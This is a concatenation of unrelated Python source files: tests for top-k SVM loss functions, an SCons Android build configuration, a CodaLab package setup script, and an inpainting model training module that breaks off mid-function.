from tests.utils import assert_all_close, V
from tests.py_ref import svm_topk_smooth_py_1, svm_topk_smooth_py_2,\
smooth_svm_py, max_svm_py, svm_topk_max_py
from torch.autograd.gradcheck import gradcheck
class TestMaxSVM(unittest.TestCase):
def setUp(self):
torch.manual_seed(1234)
np.random.seed(1234)
self.n_samples = 20
self.n_classes = 7
self.alpha = 1.
self.x = torch.randn(self.n_samples, self.n_classes)
self.y = torch.from_numpy(np.random.randint(0, self.n_classes,
size=self.n_samples))
self.k = 3
def testMaxSVM(self):
max_svm_th = MaxTop1SVM(self.n_classes, alpha=self.alpha)
res_th = max_svm_th(V(self.x), V(self.y))
res_py = max_svm_py(V(self.x), V(self.y), alpha=self.alpha)
assert_all_close(res_th, res_py)
def testMaxSVMtopk(self):
max_svm_th = MaxTopkSVM(self.n_classes, k=self.k)
res_th = max_svm_th(V(self.x), V(self.y))
res_py = svm_topk_max_py(V(self.x), V(self.y), k=self.k)
assert_all_close(res_th, res_py)
class TestSmoothSVM(unittest.TestCase):
def setUp(self):
torch.manual_seed(1234)
np.random.seed(1234)
self.n_samples = 20
self.n_classes = 7
self.tau = float(2.)
self.x = torch.randn(self.n_samples, self.n_classes)
self.y = torch.from_numpy(np.random.randint(0, self.n_classes,
size=self.n_samples))
def testSmoothSVM(self):
smooth_svm_th = SmoothTop1SVM(self.n_classes, tau=self.tau)
res_th = smooth_svm_th(V(self.x), V(self.y))
res_py = smooth_svm_py(V(self.x), V(self.y), self.tau)
assert_all_close(res_th, res_py)
class TestSmoothSVMTopk(unittest.TestCase):
def setUp(self):
torch.manual_seed(1234)
np.random.seed(1234)
self.n_samples = 2
self.n_classes = 7
self.k = 5
self.tau = float(2.)
self.x = torch.randn(self.n_samples, self.n_classes)
self.y = torch.from_numpy(np.random.randint(0, self.n_classes,
size=self.n_samples))
self.labels = torch.from_numpy(np.arange(self.n_classes))
def testSmoothSVMpy(self):
res_py_1 = svm_topk_smooth_py_1(V(self.x), V(self.y), self.tau, self.k)
res_py_2 = svm_topk_smooth_py_2(V(self.x), V(self.y), self.tau, self.k)
assert_all_close(res_py_1, res_py_2)
def testSmoothSVMth_functional(self):
F = Topk_Smooth_SVM(self.labels, self.k, self.tau)
res_th = F(V(self.x), V(self.y))
res_py = svm_topk_smooth_py_1(V(self.x), V(self.y), self.tau, self.k)
assert_all_close(res_th, res_py)
def testSmoothSVMth_loss(self):
svm_topk_smooth_th = SmoothTopkSVM(self.n_classes, tau=self.tau,
k=self.k)
res_th = svm_topk_smooth_th(V(self.x), V(self.y))
res_py = svm_topk_smooth_py_1(V(self.x),
V(self.y),
self.tau, self.k).mean()
assert_all_close(res_th, res_py)
def testSmoothSVMth_loss_scales(self):
svm_topk_smooth_th = SmoothTopkSVM(self.n_classes, tau=self.tau, k=self.k)
for scale in (1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 1e2, 1e3):
x = self.x * scale
res_th = svm_topk_smooth_th(V(x), V(self.y))
res_py = svm_topk_smooth_py_1(V(x), V(self.y), self.tau, self.k).mean()
assert_all_close(res_th, res_py)
def testGradSmoothSVMth_loss(self):
svm_topk_smooth_th = SmoothTopkSVM(self.n_classes, tau=self.tau, k=self.k)
for scale in (1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 1e2, 1e3, 1e4):
x = self.x * scale
x = Variable(x, requires_grad=True)
assert gradcheck(lambda x: svm_topk_smooth_th(x, V(self.y)),
(x,), atol=1e-2, rtol=1e-3, eps=max(1e-4 * scale, 1e-2)), \
"failed with scale {}".format(scale)
|
65146
|
import os
import sys
import platform
from distutils.version import LooseVersion
def is_active():
return True
def get_name():
return "Android"
def can_build():
return ("ANDROID_NDK_ROOT" in os.environ)
def get_platform(platform):
return int(platform.split("-")[1])
def get_opts():
from SCons.Variables import BoolVariable, EnumVariable
return [
('ANDROID_NDK_ROOT', 'Path to the Android NDK', os.environ.get("ANDROID_NDK_ROOT", 0)),
('ndk_platform', 'Target platform (android-<api>, e.g. "android-18")', "android-18"),
EnumVariable('android_arch', 'Target architecture', "armv7", ('armv7', 'armv6', 'arm64v8', 'x86', 'x86_64')),
BoolVariable('android_neon', 'Enable NEON support (armv7 only)', True),
]
def get_flags():
return [
('tools', False),
]
def create(env):
tools = env['TOOLS']
if "mingw" in tools:
tools.remove('mingw')
if "applelink" in tools:
tools.remove("applelink")
env.Tool('gcc')
return env.Clone(tools=tools)
def configure(env):
# Workaround for MinGW. See:
# http://www.scons.org/wiki/LongCmdLinesOnWin32
if (os.name == "nt"):
import subprocess
def mySubProcess(cmdline, env):
# print("SPAWNED : " + cmdline)
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, startupinfo=startupinfo, shell=False, env=env)
data, err = proc.communicate()
rv = proc.wait()
if rv:
print("=====")
print(err)
print("=====")
return rv
def mySpawn(sh, escape, cmd, args, env):
newargs = ' '.join(args[1:])
cmdline = cmd + " " + newargs
rv = 0
if len(cmdline) > 32000 and cmd.endswith("ar"):
cmdline = cmd + " " + args[1] + " " + args[2] + " "
for i in range(3, len(args)):
rv = mySubProcess(cmdline + args[i], env)
if rv:
break
else:
rv = mySubProcess(cmdline, env)
return rv
env['SPAWN'] = mySpawn
## Architecture
if env['android_arch'] not in ['armv7', 'armv6', 'arm64v8', 'x86', 'x86_64']:
env['android_arch'] = 'armv7'
neon_text = ""
if env["android_arch"] == "armv7" and env['android_neon']:
neon_text = " (with NEON)"
print("Building for Android (" + env['android_arch'] + ")" + neon_text)
can_vectorize = True
if env['android_arch'] == 'x86':
env['ARCH'] = 'arch-x86'
env.extra_suffix = ".x86" + env.extra_suffix
target_subpath = "x86-4.9"
abi_subpath = "i686-linux-android"
arch_subpath = "x86"
env["x86_libtheora_opt_gcc"] = True
if env['android_arch'] == 'x86_64':
if get_platform(env["ndk_platform"]) < 21:
print("WARNING: android_arch=x86_64 is not supported by ndk_platform lower than android-21; setting ndk_platform=android-21")
env["ndk_platform"] = "android-21"
env['ARCH'] = 'arch-x86_64'
env.extra_suffix = ".x86_64" + env.extra_suffix
target_subpath = "x86_64-4.9"
abi_subpath = "x86_64-linux-android"
arch_subpath = "x86_64"
env["x86_libtheora_opt_gcc"] = True
elif env['android_arch'] == 'armv6':
env['ARCH'] = 'arch-arm'
env.extra_suffix = ".armv6" + env.extra_suffix
target_subpath = "arm-linux-androideabi-4.9"
abi_subpath = "arm-linux-androideabi"
arch_subpath = "armeabi"
can_vectorize = False
elif env["android_arch"] == "armv7":
env['ARCH'] = 'arch-arm'
target_subpath = "arm-linux-androideabi-4.9"
abi_subpath = "arm-linux-androideabi"
arch_subpath = "armeabi-v7a"
if env['android_neon']:
env.extra_suffix = ".armv7.neon" + env.extra_suffix
else:
env.extra_suffix = ".armv7" + env.extra_suffix
elif env["android_arch"] == "arm64v8":
if get_platform(env["ndk_platform"]) < 21:
print("WARNING: android_arch=arm64v8 is not supported by ndk_platform lower than android-21; setting ndk_platform=android-21")
env["ndk_platform"] = "android-21"
env['ARCH'] = 'arch-arm64'
target_subpath = "aarch64-linux-android-4.9"
abi_subpath = "aarch64-linux-android"
arch_subpath = "arm64-v8a"
env.extra_suffix = ".armv8" + env.extra_suffix
## Build type
if (env["target"].startswith("release")):
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(LINKFLAGS=['-O2'])
env.Append(CPPFLAGS=['-O2', '-DNDEBUG', '-fomit-frame-pointer'])
else: #optimize for size
env.Append(CPPFLAGS=['-Os', '-DNDEBUG'])
env.Append(LINKFLAGS=['-Os'])
if (can_vectorize):
env.Append(CPPFLAGS=['-ftree-vectorize'])
if (env["target"] == "release_debug"):
env.Append(CPPFLAGS=['-DDEBUG_ENABLED'])
elif (env["target"] == "debug"):
env.Append(LINKFLAGS=['-O0'])
env.Append(CPPFLAGS=['-O0', '-D_DEBUG', '-UNDEBUG', '-DDEBUG_ENABLED',
'-DDEBUG_MEMORY_ENABLED', '-g', '-fno-limit-debug-info'])
## Compiler configuration
env['SHLIBSUFFIX'] = '.so'
if env['PLATFORM'] == 'win32':
env.Tool('gcc')
env.use_windows_spawn_fix()
mt_link = True
if (sys.platform.startswith("linux")):
host_subpath = "linux-x86_64"
elif (sys.platform.startswith("darwin")):
host_subpath = "darwin-x86_64"
elif (sys.platform.startswith('win')):
if (platform.machine().endswith('64')):
host_subpath = "windows-x86_64"
else:
mt_link = False
host_subpath = "windows"
if env["android_arch"] == "arm64v8":
mt_link = False
compiler_path = env["ANDROID_NDK_ROOT"] + "/toolchains/llvm/prebuilt/" + host_subpath + "/bin"
gcc_toolchain_path = env["ANDROID_NDK_ROOT"] + "/toolchains/" + target_subpath + "/prebuilt/" + host_subpath
tools_path = gcc_toolchain_path + "/" + abi_subpath + "/bin"
# For Clang to find NDK tools in preference of those system-wide
env.PrependENVPath('PATH', tools_path)
ccache_path = os.environ.get("CCACHE")
if ccache_path is None:
env['CC'] = compiler_path + '/clang'
env['CXX'] = compiler_path + '/clang++'
else:
# there aren't any ccache wrappers available for Android,
# to enable caching we need to prepend the path to the ccache binary
env['CC'] = ccache_path + ' ' + compiler_path + '/clang'
env['CXX'] = ccache_path + ' ' + compiler_path + '/clang++'
env['AR'] = tools_path + "/ar"
env['RANLIB'] = tools_path + "/ranlib"
env['AS'] = tools_path + "/as"
common_opts = ['-fno-integrated-as', '-gcc-toolchain', gcc_toolchain_path]
lib_sysroot = env["ANDROID_NDK_ROOT"] + "/platforms/" + env['ndk_platform'] + "/" + env['ARCH']
## Compile flags
env.Append(CPPFLAGS=["-isystem", env["ANDROID_NDK_ROOT"] + "/sources/cxx-stl/llvm-libc++/include"])
env.Append(CPPFLAGS=["-isystem", env["ANDROID_NDK_ROOT"] + "/sources/cxx-stl/llvm-libc++abi/include"])
env.Append(CXXFLAGS=["-std=gnu++14"])
# Disable exceptions and rtti on non-tools (template) builds
if env['tools']:
env.Append(CXXFLAGS=['-frtti'])
else:
env.Append(CXXFLAGS=['-fno-rtti', '-fno-exceptions'])
# Don't use dynamic_cast, necessary with no-rtti.
env.Append(CPPFLAGS=['-DNO_SAFE_CAST'])
ndk_version = get_ndk_version(env["ANDROID_NDK_ROOT"])
    if ndk_version is not None and LooseVersion(ndk_version) >= LooseVersion("15.0.4075724"):
print("Using NDK unified headers")
sysroot = env["ANDROID_NDK_ROOT"] + "/sysroot"
env.Append(CPPFLAGS=["--sysroot="+sysroot])
env.Append(CPPFLAGS=["-isystem", sysroot + "/usr/include/" + abi_subpath])
env.Append(CPPFLAGS=["-isystem", env["ANDROID_NDK_ROOT"] + "/sources/android/support/include"])
# For unified headers this define has to be set manually
env.Append(CPPFLAGS=["-D__ANDROID_API__=" + str(get_platform(env['ndk_platform']))])
else:
print("Using NDK deprecated headers")
env.Append(CPPFLAGS=["-isystem", lib_sysroot + "/usr/include"])
env.Append(CPPFLAGS='-fpic -ffunction-sections -funwind-tables -fstack-protector-strong -fvisibility=hidden -fno-strict-aliasing'.split())
env.Append(CPPFLAGS='-DNO_STATVFS -DGLES_ENABLED'.split())
env['neon_enabled'] = False
if env['android_arch'] == 'x86':
target_opts = ['-target', 'i686-none-linux-android']
# The NDK adds this if targeting API < 21, so we can drop it when Godot targets it at least
env.Append(CPPFLAGS=['-mstackrealign'])
elif env['android_arch'] == 'x86_64':
target_opts = ['-target', 'x86_64-none-linux-android']
elif env["android_arch"] == "armv6":
target_opts = ['-target', 'armv6-none-linux-androideabi']
env.Append(CPPFLAGS='-D__ARM_ARCH_6__ -march=armv6 -mfpu=vfp -mfloat-abi=softfp'.split())
elif env["android_arch"] == "armv7":
target_opts = ['-target', 'armv7-none-linux-androideabi']
env.Append(CPPFLAGS='-D__ARM_ARCH_7__ -D__ARM_ARCH_7A__ -march=armv7-a -mfloat-abi=softfp'.split())
if env['android_neon']:
env['neon_enabled'] = True
env.Append(CPPFLAGS=['-mfpu=neon', '-D__ARM_NEON__'])
else:
env.Append(CPPFLAGS=['-mfpu=vfpv3-d16'])
elif env["android_arch"] == "arm64v8":
target_opts = ['-target', 'aarch64-none-linux-android']
env.Append(CPPFLAGS=['-D__ARM_ARCH_8A__'])
env.Append(CPPFLAGS=['-mfix-cortex-a53-835769'])
env.Append(CPPFLAGS=target_opts)
env.Append(CPPFLAGS=common_opts)
## Link flags
    if ndk_version is not None and LooseVersion(ndk_version) >= LooseVersion("15.0.4075724"):
if LooseVersion(ndk_version) >= LooseVersion("17.1.4828580"):
env.Append(LINKFLAGS=['-Wl,--exclude-libs,libgcc.a','-Wl,--exclude-libs,libatomic.a','-nostdlib++'])
else:
env.Append(LINKFLAGS=[env["ANDROID_NDK_ROOT"] +"/sources/cxx-stl/llvm-libc++/libs/"+arch_subpath+"/libandroid_support.a"])
env.Append(LINKFLAGS=['-shared', '--sysroot=' + lib_sysroot, '-Wl,--warn-shared-textrel'])
env.Append(LIBPATH=[env["ANDROID_NDK_ROOT"] + "/sources/cxx-stl/llvm-libc++/libs/"+arch_subpath+"/"])
env.Append(LINKFLAGS=[env["ANDROID_NDK_ROOT"] +"/sources/cxx-stl/llvm-libc++/libs/"+arch_subpath+"/libc++_shared.so"])
else:
env.Append(LINKFLAGS=['-shared', '--sysroot=' + lib_sysroot, '-Wl,--warn-shared-textrel'])
if mt_link:
env.Append(LINKFLAGS=['-Wl,--threads'])
if env["android_arch"] == "armv7":
env.Append(LINKFLAGS='-Wl,--fix-cortex-a8'.split())
env.Append(LINKFLAGS='-Wl,--no-undefined -Wl,-z,noexecstack -Wl,-z,relro -Wl,-z,now'.split())
env.Append(LINKFLAGS='-Wl,-soname,libgodot_android.so -Wl,--gc-sections'.split())
env.Append(LINKFLAGS=target_opts)
env.Append(LINKFLAGS=common_opts)
env.Append(LIBPATH=[env["ANDROID_NDK_ROOT"] + '/toolchains/' + target_subpath + '/prebuilt/' +
host_subpath + '/lib/gcc/' + abi_subpath + '/4.9.x'])
env.Append(LIBPATH=[env["ANDROID_NDK_ROOT"] +
'/toolchains/' + target_subpath + '/prebuilt/' + host_subpath + '/' + abi_subpath + '/lib'])
env.Append(CPPPATH=['#platform/android'])
env.Append(CPPFLAGS=['-DANDROID_ENABLED', '-DUNIX_ENABLED', '-DNO_FCNTL'])
env.Append(LIBS=['OpenSLES', 'EGL', 'GLESv3', 'android', 'log', 'z', 'dl'])
# Return NDK version string in source.properties (adapted from the Chromium project).
def get_ndk_version(path):
if path is None:
return None
prop_file_path = os.path.join(path, "source.properties")
try:
with open(prop_file_path) as prop_file:
for line in prop_file:
key_value = list(map(lambda x: x.strip(), line.split("=")))
if key_value[0] == "Pkg.Revision":
return key_value[1]
    except (OSError, IndexError):
print("Could not read source prop file '%s'" % prop_file_path)
return None
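# For reference, the NDK's source.properties file that get_ndk_version() parses
# looks like this (version number illustrative):
#   Pkg.Desc = Android NDK
#   Pkg.Revision = 17.1.4828580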
|
65152
|
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import setuptools
import sys
# should match codalab/common.py#CODALAB_VERSION
CODALAB_VERSION = "1.1.4"
class Install(install):
_WARNING_TEMPLATE = (
'\n\n\033[1m\033[93mWarning! CodaLab was installed at {}, which is not\n'
'one of the following paths in $PATH:\n\n{}\n\nConsider adding {} to $PATH\n'
'to use the CodaLab CLI. You can do this by {}\033[0m\n\n'
)
_UNIX_FIX = 'appending the following line to your .bashrc:\nexport PATH="$PATH:{}"'
_WINDOWS_FIX = (
        'selecting System from the Control Panel, selecting Advanced system\n'
'settings, clicking Environment Variables and adding {} to the list.'
)
_WINDOWS_PLATFORM_VALUES = {'win32', 'cygwin'}
@staticmethod
def _build_fix_message(installed_path):
return (
Install._WINDOWS_FIX.format(installed_path)
if sys.platform in Install._WINDOWS_PLATFORM_VALUES
else Install._UNIX_FIX.format(installed_path)
)
def run(self):
install.run(self)
self._check_path()
def _check_path(self):
cl_path = self.install_scripts
executable_paths = os.environ['PATH'].split(os.pathsep)
if cl_path not in executable_paths:
            # Print a yellow, bold warning that the installation path is not in $PATH
print(
Install._WARNING_TEMPLATE.format(
cl_path,
'\n'.join(executable_paths),
cl_path,
Install._build_fix_message(cl_path),
)
)
def get_requirements(*requirements_file_paths):
requirements = []
for requirements_file_path in requirements_file_paths:
with open(requirements_file_path) as requirements_file:
for line in requirements_file:
if line[0:2] != '-r':
requirements.append(line.strip())
return requirements
if int(setuptools.__version__.split('.')[0]) < 25:
print(
"WARNING: Please upgrade setuptools to a newer version, otherwise installation may break. "
"Recommended command: `pip3 install -U setuptools`"
)
setup(
name='codalab',
version=CODALAB_VERSION,
description='CLI for CodaLab, a platform for reproducible computation',
long_description=(
'Visit https://worksheets.codalab.org/ or setup your own server by following the '
'instructions in the documentation (https://codalab-worksheets.readthedocs.io/en/latest/Server-Setup).'
),
url='https://github.com/codalab/codalab-worksheets',
author='CodaLab',
author_email='<EMAIL>',
license='Apache License 2.0',
keywords='codalab reproducible computation worksheets competitions',
packages=find_packages(exclude=["tests*"]),
classifiers=[
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: Apache Software License",
],
py_modules=['codalab_service'],
python_requires='~=3.6',
cmdclass={'install': Install},
include_package_data=True,
install_requires=get_requirements('requirements.txt'),
entry_points={
'console_scripts': [
'cl=codalab.bin.cl:main',
'cl-server=codalab.bin.server:main',
'cl-bundle-manager=codalab.bin.bundle_manager:main',
'codalab-service=codalab_service:main',
'cl-worker=codalab.worker.main:main',
'cl-worker-manager=codalab.worker_manager.main:main',
'cl-competitiond=scripts.competitiond:main',
]
},
zip_safe=False,
)
|
65171
|
import time
import torch
from torch.utils.data import DataLoader, RandomSampler
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm
from datasets.dataset_FTR import *
from src.models.FTR_model import *
from .inpainting_metrics import get_inpainting_metrics
from .utils import Progbar, create_dir, stitch_images, SampleEdgeLineLogits
class LaMa:
def __init__(self, config, gpu, rank, test=False):
self.config = config
self.device = gpu
self.global_rank = rank
self.model_name = 'inpaint'
kwargs = dict(config.training_model)
kwargs.pop('kind')
self.inpaint_model = LaMaInpaintingTrainingModule(config, gpu=gpu, rank=rank, test=test, **kwargs).to(gpu)
self.train_dataset = ImgDataset(config.TRAIN_FLIST, config.INPUT_SIZE, config.MASK_RATE, config.TRAIN_MASK_FLIST,
augment=True, training=True, test_mask_path=None)
if config.DDP:
self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=config.world_size,
rank=self.global_rank, shuffle=True)
# else:
# self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=1, rank=0, shuffle=True)
self.val_dataset = ImgDataset(config.VAL_FLIST, config.INPUT_SIZE, mask_rates=None, mask_path=None, augment=False,
training=False, test_mask_path=config.TEST_MASK_FLIST)
self.sample_iterator = self.val_dataset.create_iterator(config.SAMPLE_SIZE)
self.samples_path = os.path.join(config.PATH, 'samples')
self.results_path = os.path.join(config.PATH, 'results')
self.val_path = os.path.join(config.PATH, 'validation')
create_dir(self.val_path)
self.log_file = os.path.join(config.PATH, 'log_' + self.model_name + '.dat')
self.best = float("inf") if self.inpaint_model.best is None else self.inpaint_model.best
def save(self):
if self.global_rank == 0:
self.inpaint_model.save()
def train(self):
if self.config.DDP:
train_loader = DataLoader(self.train_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE // self.config.world_size,
num_workers=12, sampler=self.train_sampler)
else:
train_loader = DataLoader(self.train_dataset, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12, shuffle=True)
epoch = 0
keep_training = True
        max_iteration = int(float(self.config.MAX_ITERS))
total = len(self.train_dataset) // self.config.world_size
if total == 0 and self.global_rank == 0:
print('No training data was provided! Check \'TRAIN_FLIST\' value in the configuration file.')
return
while keep_training:
epoch += 1
if self.config.DDP:
self.train_sampler.set_epoch(epoch + 1) # Shuffle each epoch
epoch_start = time.time()
if self.global_rank == 0:
print('\n\nTraining epoch: %d' % epoch)
progbar = Progbar(total, width=20, stateful_metrics=['epoch', 'iter', 'loss_scale'],
verbose=1 if self.global_rank == 0 else 0)
for _, items in enumerate(train_loader):
self.inpaint_model.train()
items['image'] = items['image'].to(self.device)
items['mask'] = items['mask'].to(self.device)
# train
outputs, gen_loss, dis_loss, logs, batch = self.inpaint_model.process(items)
iteration = self.inpaint_model.iteration
if iteration >= max_iteration:
keep_training = False
break
logs = [
("epoch", epoch),
("iter", iteration),
] + [(i, logs[0][i]) for i in logs[0]] + [(i, logs[1][i]) for i in logs[1]]
                if not self.config.No_Bar:
                    progbar.add(len(items['image']),
                                values=logs if self.config.VERBOSE else [x for x in logs if not x[0].startswith('l_')])
# log model at checkpoints
if self.config.LOG_INTERVAL and iteration % self.config.LOG_INTERVAL == 1 and self.global_rank == 0:
self.log(logs)
# sample model at checkpoints
if self.config.SAMPLE_INTERVAL and iteration % self.config.SAMPLE_INTERVAL == 1 and self.global_rank == 0:
self.sample()
# evaluate model at checkpoints
if self.config.EVAL_INTERVAL and iteration % self.config.EVAL_INTERVAL == 1:
if self.global_rank == 0:
print('\nstart eval...\n')
print("Epoch: %d" % epoch)
psnr, ssim, fid = self.eval()
if self.best > fid and self.global_rank == 0:
self.best = fid
print("current best epoch is %d" % epoch)
print('\nsaving %s...\n' % self.inpaint_model.name)
raw_model = self.inpaint_model.generator.module if \
hasattr(self.inpaint_model.generator, "module") else self.inpaint_model.generator
torch.save({
'iteration': self.inpaint_model.iteration,
'generator': raw_model.state_dict(),
'best_fid': fid,
'ssim': ssim,
'psnr': psnr
}, os.path.join(self.config.PATH, self.inpaint_model.name + '_best_gen.pth'))
raw_model = self.inpaint_model.discriminator.module if \
hasattr(self.inpaint_model.discriminator, "module") else self.inpaint_model.discriminator
torch.save({
'discriminator': raw_model.state_dict(),
'best_fid': fid,
'ssim': ssim,
'psnr': psnr
}, os.path.join(self.config.PATH, self.inpaint_model.name + '_best_dis.pth'))
# save model at checkpoints
if self.config.SAVE_INTERVAL and iteration % self.config.SAVE_INTERVAL == 1 and self.global_rank == 0:
self.save()
if self.global_rank == 0:
print("Epoch: %d, time for one epoch: %d seconds" % (epoch, time.time() - epoch_start))
logs = [('Epoch', epoch), ('time', time.time() - epoch_start)]
self.log(logs)
print('\nEnd training....')
def eval(self):
if self.config.DDP:
val_loader = DataLoader(self.val_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE // self.config.world_size, ## BS of each GPU
num_workers=12)
else:
val_loader = DataLoader(self.val_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12)
total = len(self.val_dataset)
self.inpaint_model.eval()
        if not self.config.No_Bar:
            progbar = Progbar(total, width=20, stateful_metrics=['it'])
iteration = 0
with torch.no_grad():
for items in tqdm(val_loader):
iteration += 1
items['image'] = items['image'].to(self.device)
items['mask'] = items['mask'].to(self.device)
b, _, _, _ = items['image'].size()
# inpaint model
# eval
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
# save
outputs_merged *= 255.0
outputs_merged = outputs_merged.permute(0, 2, 3, 1).int().cpu().numpy()
for img_num in range(b):
cv2.imwrite(self.val_path + '/' + items['name'][img_num], outputs_merged[img_num, :, :, ::-1])
our_metric = get_inpainting_metrics(self.val_path, self.config.GT_Val_FOLDER, None, fid_test=True)
if self.global_rank == 0:
print("iter: %d, PSNR: %f, SSIM: %f, FID: %f, LPIPS: %f" %
(self.inpaint_model.iteration, float(our_metric['psnr']), float(our_metric['ssim']),
float(our_metric['fid']), float(our_metric['lpips'])))
logs = [('iter', self.inpaint_model.iteration), ('PSNR', float(our_metric['psnr'])),
('SSIM', float(our_metric['ssim'])), ('FID', float(our_metric['fid'])), ('LPIPS', float(our_metric['lpips']))]
self.log(logs)
return float(our_metric['psnr']), float(our_metric['ssim']), float(our_metric['fid'])
def sample(self, it=None):
# do not sample when validation set is empty
if len(self.val_dataset) == 0:
return
self.inpaint_model.eval()
with torch.no_grad():
items = next(self.sample_iterator)
items['image'] = items['image'].to(self.device)
items['mask'] = items['mask'].to(self.device)
# inpaint model
iteration = self.inpaint_model.iteration
inputs = (items['image'] * (1 - items['mask']))
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
if it is not None:
iteration = it
image_per_row = 2
if self.config.SAMPLE_SIZE <= 6:
image_per_row = 1
images = stitch_images(
self.postprocess(items['image'].cpu()),
self.postprocess(inputs.cpu()),
self.postprocess(items['mask'].cpu()),
self.postprocess(items['predicted_image'].cpu()),
self.postprocess(outputs_merged.cpu()),
img_per_row=image_per_row
)
path = os.path.join(self.samples_path, self.model_name)
name = os.path.join(path, str(iteration).zfill(5) + ".png")
create_dir(path)
print('\nsaving sample ' + name)
images.save(name)
def log(self, logs):
with open(self.log_file, 'a') as f:
f.write('%s\n' % ' '.join([str(item[0]) + '\t' + str(item[1]) for item in logs]))
def cuda(self, *args):
return (item.to(self.config.DEVICE) for item in args)
def postprocess(self, img):
# [0, 1] => [0, 255]
img = img * 255.0
img = img.permute(0, 2, 3, 1)
return img.int()
class ZITS:
def __init__(self, config, gpu, rank, test=False):
self.config = config
self.device = gpu
self.global_rank = rank
self.model_name = 'inpaint'
kwargs = dict(config.training_model)
kwargs.pop('kind')
self.inpaint_model = DefaultInpaintingTrainingModule(config, gpu=gpu, rank=rank, test=test, **kwargs).to(gpu)
if config.min_sigma is None:
min_sigma = 2.0
else:
min_sigma = config.min_sigma
if config.max_sigma is None:
max_sigma = 2.5
else:
max_sigma = config.max_sigma
if config.round is None:
round = 1
else:
round = config.round
if not test:
self.train_dataset = DynamicDataset(config.TRAIN_FLIST, mask_path=config.TRAIN_MASK_FLIST,
batch_size=config.BATCH_SIZE // config.world_size,
pos_num=config.rel_pos_num, augment=True, training=True,
test_mask_path=None, train_line_path=config.train_line_path,
add_pos=config.use_MPE, world_size=config.world_size,
min_sigma=min_sigma, max_sigma=max_sigma, round=round)
if config.DDP:
self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=config.world_size,
rank=self.global_rank, shuffle=True)
else:
self.train_sampler = DistributedSampler(self.train_dataset, num_replicas=1, rank=0, shuffle=True)
self.samples_path = os.path.join(config.PATH, 'samples')
self.results_path = os.path.join(config.PATH, 'results')
self.log_file = os.path.join(config.PATH, 'log_' + self.model_name + '.dat')
self.best = float("inf") if self.inpaint_model.best is None else self.inpaint_model.best
self.val_dataset = DynamicDataset(config.VAL_FLIST, mask_path=None, pos_num=config.rel_pos_num,
batch_size=config.BATCH_SIZE, augment=False, training=False,
test_mask_path=config.TEST_MASK_FLIST,
eval_line_path=config.eval_line_path,
add_pos=config.use_MPE, input_size=config.INPUT_SIZE,
min_sigma=min_sigma, max_sigma=max_sigma)
self.sample_iterator = self.val_dataset.create_iterator(config.SAMPLE_SIZE)
self.val_path = os.path.join(config.PATH, 'validation')
create_dir(self.val_path)
def save(self):
if self.global_rank == 0:
self.inpaint_model.save()
def train(self):
if self.config.DDP:
train_loader = DataLoader(self.train_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE // self.config.world_size,
num_workers=12, sampler=self.train_sampler)
else:
train_loader = DataLoader(self.train_dataset, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12,
sampler=self.train_sampler)
epoch = self.inpaint_model.iteration // len(train_loader)
keep_training = True
        max_iteration = int(float(self.config.MAX_ITERS))
total = len(self.train_dataset) // self.config.world_size
if total == 0 and self.global_rank == 0:
print('No training data was provided! Check \'TRAIN_FLIST\' value in the configuration file.')
return
while keep_training:
epoch += 1
if self.config.DDP or self.config.DP:
self.train_sampler.set_epoch(epoch + 1)
if self.config.fix_256 is None or self.config.fix_256 is False:
self.train_dataset.reset_dataset(self.train_sampler)
epoch_start = time.time()
if self.global_rank == 0:
print('\n\nTraining epoch: %d' % epoch)
progbar = Progbar(total, width=20, stateful_metrics=['epoch', 'iter', 'loss_scale',
'g_lr', 'd_lr', 'str_lr', 'img_size'],
verbose=1 if self.global_rank == 0 else 0)
for _, items in enumerate(train_loader):
iteration = self.inpaint_model.iteration
self.inpaint_model.train()
                for k in items:
                    if isinstance(items[k], torch.Tensor):
                        items[k] = items[k].to(self.device)
image_size = items['image'].shape[2]
random_add_v = random.random() * 1.5 + 1.5
random_mul_v = random.random() * 1.5 + 1.5 # [1.5~3]
# random mix the edge and line
if iteration > int(self.config.MIX_ITERS):
b, _, _, _ = items['edge'].shape
if int(self.config.MIX_ITERS) < iteration < int(self.config.Turning_Point):
pred_rate = (iteration - int(self.config.MIX_ITERS)) / \
(int(self.config.Turning_Point) - int(self.config.MIX_ITERS))
b = np.clip(int(pred_rate * b), 2, b)
iteration_num_for_pred = int(random.random() * 5) + 1
edge_pred, line_pred = SampleEdgeLineLogits(self.inpaint_model.transformer,
context=[items['img_256'][:b, ...],
items['edge_256'][:b, ...],
items['line_256'][:b, ...]],
mask=items['mask_256'][:b, ...].clone(),
iterations=iteration_num_for_pred,
add_v=0.05, mul_v=4)
edge_pred = edge_pred.detach().to(torch.float32)
line_pred = line_pred.detach().to(torch.float32)
if self.config.fix_256 is None or self.config.fix_256 is False:
if image_size < 300 and random.random() < 0.5:
edge_pred = F.interpolate(edge_pred, size=(image_size, image_size), mode='nearest')
line_pred = F.interpolate(line_pred, size=(image_size, image_size), mode='nearest')
else:
edge_pred = self.inpaint_model.structure_upsample(edge_pred)[0]
edge_pred = torch.sigmoid((edge_pred + random_add_v) * random_mul_v)
edge_pred = F.interpolate(edge_pred, size=(image_size, image_size), mode='bilinear',
align_corners=False)
